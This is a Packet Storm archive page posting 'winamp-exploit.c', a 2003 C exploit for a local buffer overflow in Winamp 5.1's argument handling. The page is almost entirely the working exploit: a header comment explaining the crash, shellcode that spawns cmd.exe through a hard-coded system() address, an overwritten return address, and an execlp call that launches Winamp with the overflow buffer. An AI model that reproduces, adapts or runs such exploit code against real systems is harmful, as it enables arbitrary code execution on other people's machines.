what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

winamp-exploit.c

winamp-exploit.c
Posted Dec 31, 2003
Authored by rosiello, Johnny Mast | Site rosiello.org

Local buffer overflow exploit for Winamp version 5.1.

tags | exploit, overflow, local
SHA-256 | f182b48d2c437582583fc964c2c81d32cd54caef71e771fcff223fcbabf8a6c4

winamp-exploit.c

Change Mirror Download
/* 
* Copyright © Rosiello Security
*
* http://www.rosiello.org
*
*
* Winamp_5-1_ex.c (Windows XP Pro + sp1)
* ____ _ _ _ _ _ _ _
* | _ \ ___ ___(_) ___| | | ___ __ _| |_ _| || |_/ |
* | |_) / _ \/ __| |/ _ \ | |/ _ \ / _` | __| |_ .. _| |
* | _ < (_) \__ \ | __/ | | (_) | | (_| | |_ |_ _| |
* |_| \_\___/|___/_|\___|_|_|\___/ \__,_|\__| |_||_| |_|
*
*
* ---[ @Wizard@ local Winamp V5.1 exploiter ]---
*
*
* In December of this year (2003) a good friend of mine "b0f" reported this bug in an advisory
* at www.b0f.net
*
* (BUG:)
*
* There is a simple Buffer overflow in argument handeling routine for Winamp version 5.1.
*
*
*
* just type:
*
*
* C:\\Progra~1\\Winamp\\winamp.exe AAAAAAAAA....[517 chars]...AAAAAAAAAAAA
* winamp.exe will crash
*
*
* This bug was never exploited so that was my quest.
*
* The shellcode requires
*
* system (msvcrt.dll)
*
* AUTHOR : Johnny Mast
* CONTACT: rave@rosiello.org
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <windows.h>
#include <winbase.h>
#define SYS_ADR "\x44\x80\xbf\x77"
#define EIP "\x80\xd4\x12\x00\x00"

char shellcode[]=
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"

"\x8b\xec" // mov ebp,esp
"\x55" // push ebp
"\x68\x65\x78\x65\x20" // push "exe "
"\x68\x63\x6d\x64\x2e" // push "cmd."
"\x8d\x45\xf4" // lea eax,[ebp-0xC]
"\x50" // push eax
"\xb8" SYS_ADR // mov eax,77BF8044h
"\xff\xD0"; // call eax


int main(void)
{
FILE *fd ;
char buffer[1024] ;
char whoops[1024 *2]="C:\\Progra~1\\Winamp\\winamp.exe ";
int i ;

memset( buffer,0x00,1024 ) ;
memset( buffer,0x41,260 ) ;

strcat( buffer,EIP ) ;

execlp(whoops,whoops,buffer,shellcode,NULL);
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close